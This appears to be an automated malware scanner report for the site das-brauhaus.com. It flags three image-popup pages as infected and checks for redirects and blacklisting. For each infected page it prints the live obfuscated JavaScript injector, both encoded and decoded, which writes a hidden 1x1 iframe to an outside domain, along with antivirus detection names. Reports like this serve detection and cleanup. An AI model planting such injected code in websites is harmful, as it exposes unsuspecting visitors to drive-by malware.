Malware Scanner report for das-brauhaus.com

Malicious/Suspicious/Total urls checked: 3/0/15

3 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.das-brauhaus.com/	200 OK Content-Length: 4180 Content-Type: text/html	clean
http://www.das-brauhaus.com/includes/jscript/functions.js	200 OK Content-Length: 7280 Content-Type: application/x-javascript	clean
http://www.google-analytics.com/urchin.js	200 OK Content-Length: 22678 Content-Type: text/javascript	clean
http://www.das-brauhaus.com/includes/tng/scripts/FormValidation.js	200 OK Content-Length: 33411 Content-Type: application/x-javascript	clean
http://www.das-brauhaus.com/includes/tng/scripts/FormValidation.js.php	200 OK Content-Length: 2989 Content-Type: application/javascript	clean
http://www.das-brauhaus.com/includes/common/js/base.js	200 OK Content-Length: 7805 Content-Type: application/x-javascript	clean
http://www.das-brauhaus.com/includes/common/js/utility.js	200 OK Content-Length: 81309 Content-Type: application/x-javascript	clean
http://www.das-brauhaus.com/includes/skins/style.js	200 OK Content-Length: 25319 Content-Type: application/x-javascript	clean
http://www.das-brauhaus.com/?c=news	200 OK Content-Length: 4180 Content-Type: text/html	clean
http://www.das-brauhaus.com/?c=bilder	200 OK Content-Length: 5922 Content-Type: text/html	clean
http://www.das-brauhaus.com/?c=image&gal_img=25	200 OK Content-Length: 13258 Content-Type: text/html	clean
http://www.das-brauhaus.com/includes/tng/pub/popup_image.php?id=KT_thumbnail1&n=0	200 OK Content-Length: 1290 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%61%55%2C%75%76%62%2C%54%4F%68%2C%63%71%51%2C%45%68%43%2C%41%4D%29%7B%45%68%43%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%41%4D%5B%54%4F%68%5D%3D%63%71%51%5B%54%4F%68%5D%7C%7C%54%4F%68%3B%63%71%51%3D%5B%66%75%6E%63%74%69%6F%6E%28%45%68%43%29%7B%72%65%74%75%72%6E%20%41%4D%5B%45%68%43%5D%7D%5D%3B%45%68%43%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%7 ... 222 bytes are skipped ...7%2B%45%68%43%28%54%4F%68%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%63%71%51%5B%54%4F%68%5D%29%3B%72%65%74%75%72%6E%20%61%55%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%62%65%73%6C%6F%71%61%77%65%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29')); Decoded script: eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(TOh--)AM[TOh]=cqQ[TOh]\|\|TOh;cqQ=[function(EhC){return AM[EhC]}];EhC=function(){return'\\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\\b'+EhC(TOh)+'\\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com\|\|write\|width\|besloqawe\|document\|http\|src\|iframe\|height'.split('\|'),0,{})) eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(T ... 63 bytes are skipped ...EhC=function(){return'\\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\\b'+EhC(TOh)+'\\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com\|\|write\|width\|besloqawe\|document\|http\|src\|iframe\|height'.split('\|'),0,{})) document.write("<iframe src=\"http://besloqawe.com/\" width=1 height=1>"); document.write("<iframe src=\"http://besloqawe.com/\" width=1 height=1>"); <iframe src="http://besloqawe.com/" width=1 height=1> Antivirus reports: Avast JS:Iframe-AEZ [Trj] K7AntiVirus Trojan NANO-Antivirus Trojan.Url.IframeB.lbbpa VIPRE Malware.JS.Generic (JS) F-Prot JS/IFrame.HJ AVG HTML/Framer Norman Iframe.HZ Sophos Mal/Iframe-F GData JS:Iframe-AEZ Commtouch JS/IFrame.HJ
http://www.das-brauhaus.com/test404page.js	404 Not Found Content-Length: 298 Content-Type: text/html	clean
http://www.das-brauhaus.com/includes/tng/pub/popup_image.php?id=KT_thumbnail1&n=1	200 OK Content-Length: 1290 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%61%55%2C%75%76%62%2C%54%4F%68%2C%63%71%51%2C%45%68%43%2C%41%4D%29%7B%45%68%43%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%41%4D%5B%54%4F%68%5D%3D%63%71%51%5B%54%4F%68%5D%7C%7C%54%4F%68%3B%63%71%51%3D%5B%66%75%6E%63%74%69%6F%6E%28%45%68%43%29%7B%72%65%74%75%72%6E%20%41%4D%5B%45%68%43%5D%7D%5D%3B%45%68%43%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%7 ... 222 bytes are skipped ...7%2B%45%68%43%28%54%4F%68%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%63%71%51%5B%54%4F%68%5D%29%3B%72%65%74%75%72%6E%20%61%55%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%62%65%73%6C%6F%71%61%77%65%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29')); Decoded script: eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(TOh--)AM[TOh]=cqQ[TOh]\|\|TOh;cqQ=[function(EhC){return AM[EhC]}];EhC=function(){return'\\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\\b'+EhC(TOh)+'\\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com\|\|write\|width\|besloqawe\|document\|http\|src\|iframe\|height'.split('\|'),0,{})) eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(T ... 63 bytes are skipped ...EhC=function(){return'\\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\\b'+EhC(TOh)+'\\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com\|\|write\|width\|besloqawe\|document\|http\|src\|iframe\|height'.split('\|'),0,{})) document.write("<iframe src=\"http://besloqawe.com/\" width=1 height=1>"); document.write("<iframe src=\"http://besloqawe.com/\" width=1 height=1>"); <iframe src="http://besloqawe.com/" width=1 height=1> Antivirus reports: Avast JS:Iframe-AEZ [Trj] K7AntiVirus Trojan NANO-Antivirus Trojan.Url.IframeB.lbbpa VIPRE Malware.JS.Generic (JS) F-Prot JS/IFrame.HJ AVG HTML/Framer Norman Iframe.HZ Sophos Mal/Iframe-F GData JS:Iframe-AEZ Commtouch JS/IFrame.HJ
http://www.das-brauhaus.com/includes/tng/pub/popup_image.php?id=KT_thumbnail1&n=2	200 OK Content-Length: 1290 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%61%55%2C%75%76%62%2C%54%4F%68%2C%63%71%51%2C%45%68%43%2C%41%4D%29%7B%45%68%43%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%41%4D%5B%54%4F%68%5D%3D%63%71%51%5B%54%4F%68%5D%7C%7C%54%4F%68%3B%63%71%51%3D%5B%66%75%6E%63%74%69%6F%6E%28%45%68%43%29%7B%72%65%74%75%72%6E%20%41%4D%5B%45%68%43%5D%7D%5D%3B%45%68%43%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%7 ... 222 bytes are skipped ...7%2B%45%68%43%28%54%4F%68%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%63%71%51%5B%54%4F%68%5D%29%3B%72%65%74%75%72%6E%20%61%55%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%62%65%73%6C%6F%71%61%77%65%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29')); Decoded script: eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(TOh--)AM[TOh]=cqQ[TOh]\|\|TOh;cqQ=[function(EhC){return AM[EhC]}];EhC=function(){return'\\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\\b'+EhC(TOh)+'\\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com\|\|write\|width\|besloqawe\|document\|http\|src\|iframe\|height'.split('\|'),0,{})) eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(T ... 63 bytes are skipped ...EhC=function(){return'\\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\\b'+EhC(TOh)+'\\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com\|\|write\|width\|besloqawe\|document\|http\|src\|iframe\|height'.split('\|'),0,{})) document.write("<iframe src=\"http://besloqawe.com/\" width=1 height=1>"); document.write("<iframe src=\"http://besloqawe.com/\" width=1 height=1>"); <iframe src="http://besloqawe.com/" width=1 height=1> Antivirus reports: Avast JS:Iframe-AEZ [Trj] K7AntiVirus Trojan NANO-Antivirus Trojan.Url.IframeB.lbbpa VIPRE Malware.JS.Generic (JS) F-Prot JS/IFrame.HJ AVG HTML/Framer Norman Iframe.HZ Sophos Mal/Iframe-F GData JS:Iframe-AEZ Commtouch JS/IFrame.HJ

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: das-brauhaus.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: das-brauhaus.com
Referer: http://www.google.com/search?q=das-brauhaus.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=das-brauhaus.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://das-brauhaus.com/

Result: das-brauhaus.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for das-brauhaus.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools